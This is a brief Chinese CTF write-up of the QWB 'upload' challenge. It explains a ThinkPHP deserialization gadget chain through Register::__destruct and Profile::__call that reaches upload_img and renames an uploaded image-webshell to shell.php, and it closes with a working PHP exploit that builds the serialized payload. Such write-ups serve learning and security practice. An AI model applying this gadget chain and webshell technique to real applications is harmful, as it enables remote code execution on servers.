qwb upload
当初学的时候挺难的,现在做起来觉得挺简单了
入口 Register.php
public function __destruct()
{
if(!$this->registed){
$this->checker->index();
}
}
|
调用 checker 属性的 index 方法,如果不存在,就会调用某个类的 __call 方法
正好有一个 Profile.php
public function __get($name)
{
return $this->except[$name];
}
public function __call($name, $arguments)
{
if($this->{$name}){
$this->{$this->{$name}}($arguments);
}
}
|
那么就可以通过 __call 去调用其他的方法了,这里我们选择
public function upload_img(){
if($this->checker){
if(!$this->checker->login_check()){
$curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
$this->redirect($curr_url,302);
exit();
}
}
if(!empty($_FILES)){
$this->filename_tmp=$_FILES['upload_file']['tmp_name'];
$this->filename=md5($_FILES['upload_file']['name']).".png";
$this->ext_check();
}
if($this->ext) {
if(getimagesize($this->filename_tmp)) {
@copy($this->filename_tmp, $this->filename);
@unlink($this->filename_tmp);
$this->img="../upload/$this->upload_menu/$this->filename";
$this->update_img();
}else{
$this->error('Forbidden type!', url('../index'));
}
}else{
$this->error('Unknow file type!', url('../index'));
}
}
|
checker 属性可控,ext 属性可控
进入到 @copy($this->filename_tmp, $this->filename); 即可将图片马改名
这题复盘的时候比较玄学,挺难成功的
调试过程
之后即可修改文件名
exp
<?php
namespace app\web\controller;
use think\Controller;
class Register
{
public $checker;
public $registed = false;
public function __construct($checker){
$this->checker = $checker;
}
}
class Profile
{
public $filename_tmp = './upload/2e25bf05f23b63a5b1f744933543d723/00bf23e130fa1e525e332ff03dae345d.png';
public $filename = './upload/2e25bf05f23b63a5b1f744933543d723/shell.php';
public $ext = true;
public $except = array('index' => 'upload_img');
}
$register = new Register(new Profile());
echo urlencode(base64_encode(serialize($register)));
|
